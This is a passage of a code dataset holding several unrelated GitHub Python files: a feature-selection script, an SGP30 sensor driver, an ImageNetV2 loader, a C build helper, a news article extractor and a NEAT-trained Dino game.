plt.show()\r\n\r\n rfe = RFE(rf, n_features_to_select=12)\r\n\r\n rfe.fit(X_tr, y_tr) # bugfix: was fit on the module-level X_train, y_train instead of the function arguments\r\n\r\n selected_features = np.array(features)[rfe.get_support()]\r\n print(selected_features)\r\n return selected_features\r\n\r\ndef return_new_FeaturesSelectKBest(X_tr, y_tr):\r\n\r\n fs = (SelectKBest(f_regression, k=12)).fit(X_tr, y_tr)\r\n print(type(fs))\r\n features = X_tr.columns[fs.get_support()]\r\n print(features)\r\n\r\n return features\r\n\r\ndef models(X_tr, y_tr, X_te, 
y_te):\r\n reg_RF = RandomForestRegressor(n_estimators=100, random_state=0)\r\n reg_RF.fit(X_tr, y_tr)\r\n print(\"Random Forest Regressor Train Performance \",\r\n mean_squared_error(np.log(y_tr), np.log(reg_RF.predict(X_tr))))\r\n print(\"Random Forest Regressor Test Performance \",\r\n mean_squared_error(np.log(y_te), np.log(reg_RF.predict(X_te))))\r\n\r\n\r\ndf_train = pd.read_csv('TrainTransformed.csv')\r\ndf_test = pd.read_csv('TestTransformed.csv')\r\nX_train, y_train = df_train.loc[:, df_train.columns != 'SalePrice'], df_train.loc[:, df_train.columns == 'SalePrice']\r\nX_test, y_test = df_test.loc[:, df_test.columns != 'SalePrice'], df_test.loc[:, df_test.columns == 'SalePrice']\r\ntest=15\r\n\r\n\r\nX_train_Normal = X_train.astype('float32')\r\nX_test_Normal = X_test.astype('float32')\r\n\r\nX_train_FNormal=X_train_Normal\r\nX_test_FNormal=X_test_Normal\r\n\r\nprint(\"Before Feature Selection \")\r\nmin_max_scaler = preprocessing.MinMaxScaler()\r\nX_train_Normal = min_max_scaler.fit_transform(X_train_Normal)\r\nX_test_Normal = min_max_scaler.transform(X_test_Normal)\r\nmodels(X_train_Normal, y_train, X_test_Normal, y_test)\r\n\r\ncolumns = return_new_FeaturesRFE(X_train, y_train)\r\nX_train_FNormal = X_train_FNormal[columns]\r\nX_test_FNormal = X_test_FNormal[columns]\r\nprint(X_train_FNormal.columns)\r\n\r\nmin_max_scaler = preprocessing.MinMaxScaler()\r\nX_train_FNormal = min_max_scaler.fit_transform(X_train_FNormal)\r\nX_test_FNormal = min_max_scaler.transform(X_test_FNormal)\r\nprint(\"After Feature Selection \")\r\nmodels(X_train_FNormal, y_train, X_test_FNormal, y_test)\r\n\r\n\r\n\r\n\r\n# Random Forest Regressor Train Performance 0.025823662996025752\r\n# Random Forest Regressor Test Performance 0.07690290727784801\r\n\r\n\r\n","repo_name":"OmerMintemur/Feature-Elimination-Using-GA","sub_path":"AmesHouses/BaseModelsFeatSelection.py","file_name":"BaseModelsFeatSelection.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41676346959","text":"# 2018 / MIT / Tim Clem / github.com/misterfifths\n# See LICENSE for details\n# Heavily inspired by the Adafruit CircuitPython implementation by ladyada:\n# https://github.com/adafruit/Adafruit_CircuitPython_SGP30\n# CRC implementation taken entirely from there, in fact.\n\nfrom __future__ import print_function\n\nfrom smbus import SMBus\nfrom collections import namedtuple\nfrom time import sleep\nimport struct\nfrom threading import Lock\nfrom sys import stderr\nfrom math import modf\nfrom datetime import datetime\n\n\nSGP30Command = namedtuple(\n 'SGP30Command',\n 'opcode_bytes required_feature_set parameter_length response_length response_time_ms')\n\n\n_SGP30_CMDS = {\n 'get_serial_number': SGP30Command([0x36, 0x82], None, 0, 9, 1),\n 'get_feature_set_version': SGP30Command((0x20, 0x2f), None, 0, 3, 2),\n\n 'init_air_quality': SGP30Command((0x20, 0x03), 0x20, 0, 0, 10),\n 'measure_air_quality': SGP30Command((0x20, 0x08), 0x20, 0, 6, 12),\n 'get_baseline': SGP30Command((0x20, 0x15), 0x20, 0, 6, 10),\n 'set_baseline': SGP30Command((0x20, 0x1e), 0x20, 6, 0, 10),\n 'set_humidity': SGP30Command((0x20, 0x61), 0x20, 3, 0, 10),\n 'measure_raw_signals': SGP30Command((0x20, 0x50), 0x20, 0, 6, 25)\n}\n\n_SGP30_CRC_INIT = 0xff\n_SGP30_CRC_POLYNOMIAL = 0x31\n\n_SGP30_FEATURE_SET_BITMASK = 0b0000000011100000\n\n\ndef _log(*args):\n print('[SGP30]', *args, file=stderr)\n\n\n_RawSample = namedtuple('RawSample', 'timestamp raw_co2 raw_voc')\nclass 
RawSample(_RawSample):\n def __new__(cls, raw_co2, raw_voc):\n self = super(RawSample, cls).__new__(cls, datetime.now(), raw_co2, raw_voc)\n return self\n\n_AirQuality = namedtuple('AirQuality', 'timestamp co2_ppm voc_ppb')\nclass AirQuality(_AirQuality):\n def __new__(cls, co2_ppm, voc_ppb):\n self = super(AirQuality, cls).__new__(cls, datetime.now(), co2_ppm, voc_ppb)\n return self\n\n def is_probably_warmup_value(self):\n return self.co2_ppm == 400 and self.voc_ppb == 0\n\n\nclass SGP30(object):\n def __init__(self, smbus, i2c_address=0x58):\n self.i2c_address = i2c_address\n\n self._raw_feature_set = None\n self.chip_version = None\n self.serial_number = None\n\n self._bus = smbus\n self.__bus_lock = Lock()\n\n\n def __enter__(self):\n self.open()\n return self\n\n def __exit__(self, exception_type, exception_value, traceback):\n self.close()\n\n def open(self):\n self.serial_number = self._get_serial_number()\n sn_string = ' '.join('0x{:04x}'.format(x) for x in self.serial_number)\n _log('got serial number: ' + sn_string)\n\n self._raw_feature_set = self._get_feature_set_version()\n self.chip_version = self._raw_feature_set & _SGP30_FEATURE_SET_BITMASK\n _log('chip version: ' + hex(self.chip_version) + ' (raw: ' + hex(self._raw_feature_set) + ')')\n\n _log('initing...')\n self._init_air_quality()\n _log('inited')\n\n def close(self):\n self._bus.close()\n\n\n def _get_serial_number(self):\n return self._run_word_getter('get_serial_number')\n\n def _get_feature_set_version(self):\n # The spec sheet says we should ignore the MSB of this response,\n # and that the last five bits of the LSB are 'subject to change.'\n # Use _has_feature_set() to check its value against another.\n return self._run_word_getter('get_feature_set_version')[0]\n\n def _has_feature_set(self, required_feature_set):\n if required_feature_set is None:\n return True\n\n return self.chip_version == (required_feature_set & _SGP30_FEATURE_SET_BITMASK)\n\n\n def _init_air_quality(self):\n return self._run_command(_SGP30_CMDS['init_air_quality'])\n\n\n def measure_air_quality(self):\n co2_ppm, voc_ppb = self._run_word_getter('measure_air_quality')\n return AirQuality(co2_ppm, voc_ppb)\n\n def get_baseline(self):\n raw_co2, raw_voc = self._run_word_getter('get_baseline')\n return RawSample(raw_co2, raw_voc)\n\n def set_baseline(self, co2_baseline, voc_baseline):\n self._run_word_setter('set_baseline', [co2_baseline, voc_baseline])\n\n def set_humidity(self, humidity_g_per_m3):\n fpart, ipart = modf(humidity_g_per_m3)\n\n assert ipart < 256, 'Humidity must be less than 256 g/m^3'\n\n ipart = int(ipart)\n quantized_fpart = int(round(fpart * 256))\n\n humidity_word = (ipart & 0xff) << 8 | (quantized_fpart & 0xff)\n\n self._set_humidity_raw(humidity_word)\n\n # This takes the raw integer value for the humidity, which is in a weird format (see\n # the spec sheet). 
Probably just use set_humidity().\n def _set_humidity_raw(self, humidity):\n self._run_word_setter('set_humidity', [humidity])\n\n def measure_raw_signals(self):\n raw_co2, raw_voc = self._run_word_getter('measure_raw_signals')\n return RawSample(raw_co2, raw_voc)\n\n\n def _run_word_getter(self, cmd_name):\n cmd = _SGP30_CMDS[cmd_name]\n assert cmd.parameter_length == 0, 'This method only understands commands that take no parameters'\n assert cmd.response_length % 3 == 0, 'This method only understands commands whose response is a set of (2-byte word + 1-byte checksum) pairs (i.e., the number of response bytes must be divisible by three)'\n\n word_count = cmd.response_length / 3\n raw_bytes = self._run_command(cmd)\n return self._read_checksummed_words(raw_bytes, word_count)\n\n def _run_word_setter(self, cmd_name, words):\n cmd = _SGP30_CMDS[cmd_name]\n assert cmd.response_length == 0, 'This method only understands commands that have no response'\n assert cmd.parameter_length > 0, 'This method only understands commands that take parameters'\n assert cmd.parameter_length % 3 == 0, 'This method only understands commands whose parameter is a set of (2-byte word + 1-byte checksum) pairs (i.e., the number of parameter bytes must be divisible by three)'\n\n param_bytes = self._bytes_for_checksummed_words(words)\n self._run_command(cmd, param_bytes)\n\n\n def _run_command(self, cmd, param_bytes=None):\n assert self._has_feature_set(cmd.required_feature_set), 'Unsupported chip version for this command'\n\n bytes_to_write = list(cmd.opcode_bytes)\n\n if cmd.parameter_length > 0:\n assert len(param_bytes) == cmd.parameter_length, 'Invalid number of parameter bytes for command'\n bytes_to_write.extend(param_bytes)\n\n with self.__bus_lock:\n self.__write_bytes(bytes_to_write)\n sleep(cmd.response_time_ms / 1000.0)\n\n if cmd.response_length > 0:\n return self.__read_bytes(cmd.response_length)\n\n return None\n\n # NOT LOCKED. Use _run_command!\n def __read_bytes(self, length):\n return bytearray(self._bus.read_i2c_block_data(self.i2c_address, 0, length))\n\n # NOT LOCKED. 
Use _run_command!\n def __write_bytes(self, raw_bytes):\n assert len(raw_bytes) >= 1\n\n cmd_byte = raw_bytes[0]\n arg_bytes = list(raw_bytes[1:]) # bytes may or may not be a tuple\n\n self._bus.write_i2c_block_data(self.i2c_address, cmd_byte, arg_bytes)\n\n @classmethod\n def _read_checksummed_word(cls, data, offset=0):\n word_bytes = data[offset:offset + 2]\n word, checksum = struct.unpack_from('>HB', data, offset)\n assert checksum == cls._crc(word_bytes), 'Bad checksum!'\n return word\n\n @classmethod\n def _read_checksummed_words(cls, data, count):\n res = []\n for i in range(count):\n offset = (2 + 1) * i # 2 bytes + checksum byte\n word = cls._read_checksummed_word(data, offset=offset)\n res.append(word)\n\n return res\n\n @classmethod\n def _bytes_for_checksummed_words(cls, words):\n res = bytearray()\n for word in words:\n # just going to let the error from struct.pack handle the case of the word being > 65536\n word_bytes = bytearray(struct.pack('>H', word))\n res.extend(word_bytes)\n\n res.append(cls._crc(word_bytes))\n\n return res\n\n @classmethod\n def _crc(cls, data):\n crc = _SGP30_CRC_INIT\n # calculates 8-Bit checksum with given polynomial\n for byte in data:\n crc ^= byte\n for _ in range(8):\n if crc & 0x80:\n crc = (crc << 1) ^ _SGP30_CRC_POLYNOMIAL\n else:\n crc <<= 1\n return crc & 0xFF\n","repo_name":"misterfifths/sgp30","sub_path":"sgp30.py","file_name":"sgp30.py","file_ext":"py","file_size_in_byte":8525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"2991857711","text":"from PIL import Image\n\nfrom imagenetv2_pytorch import ImageNetV2Dataset\n\nfrom .imagenet import ImageNet\n\nclass ImageNetV2DatasetWithPaths(ImageNetV2Dataset):\n def __getitem__(self, i):\n img, label = Image.open(self.fnames[i]), int(self.fnames[i].parent.name)\n if self.transform is not None:\n img = self.transform(img)\n return {\n 'images': img,\n 'labels': label,\n 'image_paths': str(self.fnames[i])\n }\n\nclass ImageNetV2(ImageNet):\n def get_test_dataset(self):\n return ImageNetV2DatasetWithPaths(transform=self.preprocess, location=self.location)\n","repo_name":"mlfoundations/wise-ft","sub_path":"src/datasets/imagenetv2.py","file_name":"imagenetv2.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":483,"dataset":"github-code","pt":"78"} +{"seq_id":"32560238182","text":"from pathlib import Path\nfrom datetime import datetime\nimport os\nimport sys\nimport re\n\n\ndef apply(func, *iterables):\n \"\"\" Apply function by getting one element of each elements of iterables. \"\"\"\n for args in zip(*iterables):\n func(*args)\n\n\ndef _p(path):\n return Path(path).resolve()\n\n\nclass Info:\n \"\"\" Basics info of a file. 
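The `_crc` routine in the sgp30.py record above is the Sensirion CRC-8 (polynomial 0x31, initial value 0xFF, MSB first, no reflection or final XOR) applied to each 2-byte word. A self-contained sketch of the same algorithm, checked against the test vector Sensirion publishes in its sensor datasheets:

def crc8(data, init=0xff, poly=0x31):
    # Bitwise CRC-8 over an iterable of byte values.
    crc = init
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = ((crc << 1) ^ poly) if crc & 0x80 else crc << 1
            crc &= 0xff
    return crc

assert crc8([0xBE, 0xEF]) == 0x92  # documented Sensirion test vector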
\"\"\"\n\n def __init__(self, path):\n # set of the path of dependences\n self.deps = set()\n\n # the last modification date of the file (min if not exist)\n self.date = datetime.min\n # if the path exist get it's last modification dates\n if path.exists():\n self.date = datetime.fromtimestamp(int(path.stat().st_mtime))\n\n # last depedence modification date (can't be less than it's self)\n self.deps_date = self.date\n\n @property\n def out_dated(self):\n \"\"\" If the file out dated \"\"\"\n return self.date < self.deps_date\n\n\nclass Builder:\n\n regex = re.compile('^#include \"([^\"]*)\"$')\n\n def __init__(self, main, out, src, obj, cc, cflag):\n self.main = _p(main)\n self.out = _p(out)\n self.src = _p(src)\n self.obj = _p(obj)\n self.cc = cc\n self.cflag = f'-I {src} {cflag}'\n\n self.infos = dict()\n\n # build the depencies graph\n self.proccess(self.main)\n # get info the the binnary\n bin_info = self.infos[self.out]\n # upate to get it's dependecies date\n self.update(self.out)\n\n # if the binnary is up to date do noting\n if bin_info.out_dated:\n # build the object files if there were out dated\n apply(self.gcc, filter(self.is_out_dated, bin_info.deps))\n # build the binnary\n self.gcc(self.out, option='')\n else:\n # print message if up to date\n print('Up to date')\n\n def deps_date(self, path):\n \"\"\" The depencies max date of the file. \"\"\"\n return self.infos[path].deps_date\n\n def is_out_dated(self, path):\n \"\"\" If the file is out dated \"\"\"\n return self.infos[path].out_dated\n\n def add(self, path):\n \"\"\" Add the file into the infos and return if we added or not. \"\"\"\n # If file is already init return false\n if path in self.infos:\n return False\n # If it's not inside init it and return true\n else:\n self.infos[path] = Info(path)\n return True\n\n def link(self, src, dep):\n \"\"\" Mark \"dep\" as a Dependence of the \"src\". \"\"\"\n self.add(src)\n self.infos[src].deps.add(dep)\n\n @staticmethod\n def get_deps(file):\n \"\"\" Get the list of the depedency of the file. \"\"\"\n # deps list\n deps = []\n\n # get each match for each line\n for match in map(Builder.regex.match, file):\n # if there is a match\n if match:\n # add it to the dependecy\n deps.append(match.group(1))\n\n # retur the deps list (string)\n return deps\n\n def update(self, path):\n \"\"\" Update the deps_date atribute. \"\"\"\n # the max bwtween it's self and it's dependy dependities dates\n info = self.infos[path]\n info.deps_date = max(\n [info.date] +\n list(map(self.deps_date, info.deps))\n )\n\n def expend(self, src, dst):\n # get the prefix\n start = dst[0]\n\n # if it is a relative path\n if start == '.':\n # calcule path relative to the source file\n path = src.parent / dst\n # if it's a absolute path\n elif start == '/':\n # use the root source dir as reference\n path = self.src / dst\n # if no indication\n else:\n # test each of the possible origins\n path = src.parent / dst # relative\n if not path.exists():\n path = self.src / dst # absolute\n\n # if the path didn't exist return an error\n if not path.exists():\n raise ValueError(f'ERROR: can\\'t find \"{dst}\" from \"{src}\"')\n\n # normalize path to not have the dots paths\n path = path.resolve()\n\n # return the expended path\n return path\n\n @staticmethod\n def is_source_file(path):\n \"\"\" return if the file is a source files \"\"\"\n return path.suffix in ['.c', '.h']\n\n def get_obj(self, path):\n \"\"\" Get the object file path base on the source file. 
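A note on `Builder.regex` above: the pattern '^#include "([^"]*)"$' matches only quoted includes, so angle-bracket system headers never enter the dependency graph. A quick illustration with made-up source lines:

import re

regex = re.compile('^#include "([^"]*)"$')

lines = ['#include <stdio.h>\n', '#include "util.h"\n', 'int main(void) {}\n']
# Same filtering as Builder.get_deps(): keep only the quoted targets.
deps = [m.group(1) for m in map(regex.match, lines) if m]
assert deps == ['util.h']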
\"\"\"\n # get the path relative to the src path\n src = path.relative_to(self.src)\n # create the object path by using the object dirrectory and replace the\n # suffix\n obj = self.obj / src.with_suffix('.o')\n # normalize the path\n obj.resolve()\n # return it\n return obj\n\n def parse_source(self, path):\n \"\"\" Add all the dependecy by getting the depency of the source file \"\"\"\n with open(path, 'r', encoding='utf8') as file:\n for dep in self.get_deps(file):\n dep = self.expend(path, dep)\n self.proccess(dep)\n self.link(path, dep)\n\n def proccess_module(self, path):\n \"\"\" Get the dependcy of the given modules \"\"\"\n module = path.parent\n # if it's not a module do nothing\n if not module.exists():\n return\n # include all the public and private source\n for access in ['public', 'private']:\n # get the folter\n folder = module / access\n # if the folder exist\n if folder.exists():\n # procces each source files\n for dep in filter(self.is_source_file, folder.iterdir()):\n self.proccess(dep)\n self.link(path, dep)\n\n self.update(path)\n\n def proccess(self, path):\n \"\"\"\n Get reclusively all the dependency of the path and compute it's dependency\n date.\n \"\"\"\n # proccess one time each path\n # don't proccess not existing path\n if self.add(path) and path.exists():\n # get and proccess each depedency of the file\n self.parse_source(path)\n # update the dependency dates\n self.update(path)\n\n # back propagate the header files\n\n # if it is a header get the corresponding source file\n if path.suffix == '.h':\n # proccess basics include\n self.proccess(path.with_suffix('.c'))\n # proccess module\n self.proccess_module(path)\n\n # if it is a source file add the object and linked it to the binnary\n if path.suffix == '.c':\n # get object path\n obj = self.get_obj(path)\n # link the source to the object\n self.link(obj, path)\n # link the object to the binnaty\n self.link(self.out, obj)\n # update the object infos\n self.update(obj)\n\n @staticmethod\n def run_command(command):\n \"\"\" Print and run a command. \"\"\"\n # show the command\n print(' '.join(command))\n # execute the command\n result = os.system(' '.join(command))\n # if there is an error return it\n if result != 0:\n exit(1)\n\n def gcc(self, path, option='-c'):\n \"\"\" Compile the source file base on the option. \"\"\"\n # create output dirrectory if not exist\n path.parent.mkdir(parents=True, exist_ok=True)\n\n # the current dir\n cwd = os.getcwd()\n\n def get_path(path):\n \"\"\" Shotten the path and covert it to string. 
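The staleness rule driving the incremental rebuild (`Info.out_dated`) reduces to one comparison: a file is rebuilt when some dependency's effective timestamp is newer than its own. A condensed, runnable restatement (the names here are illustrative, not from the script):

from datetime import datetime

def effective_date(own_date, dep_dates):
    # Mirrors Builder.update(): a node's effective timestamp is the max of
    # its own mtime and its dependencies' effective timestamps.
    return max([own_date] + list(dep_dates))

built = datetime(2021, 1, 1)
header_touched = datetime(2021, 6, 1)
# An object built in January is stale once a header it includes changed in June.
assert built < effective_date(built, [header_touched])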
\"\"\"\n return str(path.relative_to(cwd))\n\n # the the gcc command with the corresponding option\n self.run_command([\n self.cc,\n option, ' '.join(map(get_path, self.infos[path].deps)),\n '-o', get_path(path),\n self.cflag\n ])\n","repo_name":"JulesdeCube/UnCoin","sub_path":"scripts/buidler.py","file_name":"buidler.py","file_ext":"py","file_size_in_byte":7929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11846514504","text":"from datetime import datetime\nfrom typing import Any, Dict\nfrom App.Addons.article_utils import (\n ALLOWED_H,\n LIST_TAGS,\n TABLE_TAGS,\n article_content_transform,\n author_transform,\n brief_transform,\n category_transform,\n headline_transform,\n iso_date_transform,\n keywords_transform,\n)\nfrom cmoncrawl.processor.extraction.utils import (\n get_attribute_transform,\n get_tags_transform,\n get_text_list_transform,\n get_text_transform,\n)\nfrom cmoncrawl.common.types import PipeMetadata\nfrom bs4 import BeautifulSoup, Tag\nfrom App.Addons.article_extractor import ArticleExtractor\n\n\nallowed_classes_div = {\n # text\n \"article__photo\",\n \"infobox\",\n}\n\n\ndef article_fc(tag: Tag):\n if tag.name in [*LIST_TAGS, \"figure\", *TABLE_TAGS]:\n return True\n\n if tag.name in [\"p\", *ALLOWED_H]:\n return True\n\n classes = tag.get(\"class\", [])\n if isinstance(classes, str):\n classes = [classes]\n if tag.name == \"div\" and len(allowed_classes_div.intersection(classes)) > 0:\n return True\n\n return False\n\n\nclass AktualneCZV3Extractor(ArticleExtractor):\n\n def __init__(self):\n\n super().__init__(\n {\n \"headline\": \"meta[property='og:title']\",\n \"keywords\": \"meta[name='keywords']\",\n \"publication_date\": \"meta[property='article:published_time']\",\n \"category\": \"meta[property='article:section']\",\n \"brief\": \"meta[property='og:description']\",\n },\n {\n \"headline\": [get_attribute_transform(\"content\"), headline_transform],\n \"keywords\": [get_attribute_transform(\"content\"), keywords_transform],\n \"publication_date\": [\n get_attribute_transform(\"content\"),\n iso_date_transform,\n ],\n \"category\": [get_attribute_transform(\"content\"), category_transform],\n \"brief\": [get_attribute_transform(\"content\"), brief_transform],\n },\n {\n \"content\": \"div.article__content\",\n \"author\": \"div.author\",\n \"category\": \"div.header__menu > nav > ul > li:nth-child(1) > a\",\n },\n {\n \"content\": article_content_transform(article_fc),\n \"category\": [get_text_transform, category_transform],\n \"author\": [\n get_tags_transform(\"div > a.author__name\"),\n get_text_list_transform(\",\"),\n author_transform,\n ],\n },\n \"body\",\n )\n\n def custom_filter_raw(self, response: str, metadata: PipeMetadata) -> bool:\n parsed = metadata.url_parsed.path.split(\"/\")\n if len(parsed) > 1 and parsed[1] in [\"wiki\"]:\n return False\n return True\n\n def custom_extract(\n self, soup: BeautifulSoup, metadata: PipeMetadata\n ) -> Dict[str, Any]:\n return {\"comments_num\": None}\n\n\nextractor = AktualneCZV3Extractor()\n","repo_name":"hynky1999/Czech-News-Classification-dataset","sub_path":"Processor/CZExtractors/aktualne_cz/aktualne_cz_v3.py","file_name":"aktualne_cz_v3.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39839101107","text":"import pygame\nimport neat\nimport os\nimport sys\nimport random\nimport math\n\npygame.init()\n\n# Global 
Constants\npygame.display.set_caption(\"Dino AI\")\nSCREEN_HEIGHT = 600\nSCREEN_WIDTH = 1100\nSCREEN = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\nRUNNING = [pygame.image.load(os.path.join(\"Assets/Dino\", \"DinoRun1.png\")),\n pygame.image.load(os.path.join(\"Assets/Dino\", \"DinoRun2.png\"))]\n\nJUMPING = pygame.image.load(os.path.join(\"Assets/Dino\", \"DinoJump.png\"))\n\nBG = pygame.image.load(os.path.join(\"Assets/Other\", \"Track.png\"))\n\nSMALL_CACTUS = [pygame.image.load(os.path.join(\"Assets/Cactus\", \"SmallCactus1.png\")),\n pygame.image.load(os.path.join(\"Assets/Cactus\", \"SmallCactus2.png\")),\n pygame.image.load(os.path.join(\"Assets/Cactus\", \"SmallCactus3.png\"))]\nLARGE_CACTUS = [pygame.image.load(os.path.join(\"Assets/Cactus\", \"LargeCactus1.png\")),\n pygame.image.load(os.path.join(\"Assets/Cactus\", \"LargeCactus2.png\")),\n pygame.image.load(os.path.join(\"Assets/Cactus\", \"LargeCactus3.png\"))]\n\n\nFONT = pygame.font.Font('freesansbold.ttf', 20)\n\nhighscore = 0\n\n# Dinosaur (\"Player\")\nclass Dinosaur:\n X_POS = 80\n Y_POS = 310\n JUMP_VEL = 8.5\n\n def __init__(self, img=RUNNING[0]):\n self.image = img\n self.dino_run = True\n self.dino_jump = False\n self.jump_vel = self.JUMP_VEL\n self.rect = pygame.Rect(self.X_POS, self.Y_POS, img.get_width(), img.get_height())\n self.color = (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))\n self.step_index = 0\n\n # Update Function\n def update(self):\n if self.dino_run:\n self.run()\n if self.dino_jump:\n self.jump()\n if self.step_index >= 10:\n self.step_index = 0\n\n # Draw Function\n def draw(self, SCREEN):\n SCREEN.blit(self.image, (self.rect.x, self.rect.y))\n pygame.draw.rect(SCREEN, self.color, (self.rect.x, self.rect.y, self.rect.width, self.rect.height), 2)\n for obstacle in obstacles:\n pygame.draw.line(SCREEN, self.color, (self.rect.x + 54, self.rect.y + 12), obstacle.rect.center, 2)\n\n # Running\n def run(self):\n self.image = RUNNING[self.step_index // 5]\n self.rect.x = self.X_POS\n self.rect.y = self.Y_POS\n self.step_index += 1\n\n # Jumping\n def jump(self):\n self.image = JUMPING\n if self.dino_jump:\n self.rect.y -= self.jump_vel * 4\n self.jump_vel -= 0.8\n if self.jump_vel <= -self.JUMP_VEL:\n self.dino_jump = False\n self.dino_run = True\n self.jump_vel = self.JUMP_VEL\n\n# Obstacles\nclass Obstacle:\n def __init__(self, image, number_of_cacti):\n self.image = image\n self.type = number_of_cacti\n self.rect = self.image[self.type].get_rect()\n self.rect.x = SCREEN_WIDTH\n\n # Updating Obstacles\n def update(self):\n self.rect.x -= game_speed\n if self.rect.x < -self.rect.width:\n obstacles.pop()\n\n # Drawing Obstacles\n def draw(self, SCREEN):\n SCREEN.blit(self.image[self.type], self.rect)\n\n# Tall Cactus\nclass CactusBig(Obstacle):\n def __init__(self, image, number_of_cacti):\n super().__init__(image, number_of_cacti)\n self.rect.y = 300\n\n# Small Cactus\nclass CactusSmall(Obstacle):\n def __init__(self, image, number_of_cacti):\n super().__init__(image, number_of_cacti)\n self.rect.y = 325\n\n\n# Population\ndef remove(index):\n Dinos.pop(index)\n ge.pop(index)\n nets.pop(index)\n\n\n# Fetching Distance\ndef distance(pos_a, pos_b):\n dx = pos_a[0]-pos_b[0]\n dy = pos_a[1]-pos_b[1]\n return math.sqrt(dx**2+dy**2)\n\n# Calculating and evaluating Genomes\ndef eval_genomes(genomes, config):\n global game_speed, x_pos_bg, y_pos_bg, obstacles, Dinos, ge, nets, points, highscore\n clock = pygame.time.Clock()\n points = 0\n\n obstacles = []\n Dinos = []\n ge 
= []\n nets = []\n\n x_pos_bg = 0\n y_pos_bg = 380\n game_speed = 20\n\n for genome_id, genome in genomes:\n Dinos.append(Dinosaur())\n ge.append(genome)\n net = neat.nn.FeedForwardNetwork.create(genome, config)\n nets.append(net)\n genome.fitness = 0\n\n # Calculating Score and Best Score\n def score():\n # Increasing Game Speed\n global points, game_speed, highscore\n points += 1\n if points % 100 == 0:\n game_speed += 1\n #Calculating Best Score\n if points >= highscore:\n highscore = points\n\n # Displaying Score and Best Score\n text = FONT.render(f'Score: {str(points)}', True, (0, 0, 0))\n text_H = FONT.render(f'Best Score: {str(highscore)}', True, (0, 0, 0))\n\n SCREEN.blit(text, (950, 50))\n SCREEN.blit(text_H, (901, 80))\n\n # Displaying Statistics\n def statistics():\n global Dinos, game_speed, ge\n text_1 = FONT.render(f'Dinosaurs Alive: {str(len(Dinos))}', True, (0, 0, 0))\n text_2 = FONT.render(f'Generation: {pop.generation+1}', True, (0, 0, 0))\n text_3 = FONT.render(f'Speed: {str(game_speed)}', True, (0, 0, 0))\n\n SCREEN.blit(text_1, (50, 450))\n SCREEN.blit(text_2, (50, 480))\n SCREEN.blit(text_3, (50, 510))\n\n # Defining Window\n def background():\n global x_pos_bg, y_pos_bg\n image_width = BG.get_width()\n SCREEN.blit(BG, (x_pos_bg, y_pos_bg))\n SCREEN.blit(BG, (image_width + x_pos_bg, y_pos_bg))\n if x_pos_bg <= -image_width:\n x_pos_bg = 0\n x_pos_bg -= game_speed\n\n run = True\n while run:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n SCREEN.fill((255, 255, 255))\n\n for dinosaur in Dinos:\n dinosaur.update()\n dinosaur.draw(SCREEN)\n\n if len(Dinos) == 0:\n break\n\n # Randomly choosing cactus size\n if len(obstacles) == 0:\n rand_int = random.randint(0, 1)\n if rand_int == 0:\n obstacles.append(CactusSmall(SMALL_CACTUS, random.randint(0, 2)))\n elif rand_int == 1:\n obstacles.append(CactusBig(LARGE_CACTUS, random.randint(0, 2)))\n\n for obstacle in obstacles:\n obstacle.draw(SCREEN)\n obstacle.update()\n # Decreasing Fitness on collision\n for i, dinosaur in enumerate(Dinos):\n# ge[i].fitness += 0.1\n# dinosaur.update\n if dinosaur.rect.colliderect(obstacle.rect):\n ge[i].fitness += points\n remove(i)\n\n for i, dinosaur in enumerate(Dinos):\n output = nets[i].activate((dinosaur.rect.y,\n distance((dinosaur.rect.x, dinosaur.rect.y),\n obstacle.rect.midtop)))\n if output[0] > 0.5 and dinosaur.rect.y == dinosaur.Y_POS:\n dinosaur.dino_jump = True\n dinosaur.dino_run = False\n\n statistics()\n score()\n background()\n clock.tick(30)\n pygame.display.update()\n\n\n# Setting up the NEAT Neural Network\ndef run(config_path):\n global pop\n config = neat.config.Config(\n neat.DefaultGenome,\n neat.DefaultReproduction,\n neat.DefaultSpeciesSet,\n neat.DefaultStagnation,\n config_path\n )\n\n pop = neat.Population(config)\n pop.run(eval_genomes, 50)\n\n\nif __name__ == '__main__':\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config.txt')\n run(config_path)","repo_name":"lammjan/neat-Dino-AI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32696158434","text":"import matplotlib.pyplot as plt\nfrom sklearn.manifold import TSNE\n\nfrom news20.dataset import news20_data\nfrom news20.finetune import build_news20_model\n\n\ndef visualize(data, labels):\n numdim = data[0].shape[0]\n\n autoencoder, encoder = build_news20_model(numdim)\n\n 
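    # Assumption: `encoder` shares its layer objects with `autoencoder` (the
    # usual Keras pattern when a builder returns both models from one layer
    # stack), so loading the autoencoder's weights below also primes the
    # encoder that computes the projections.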
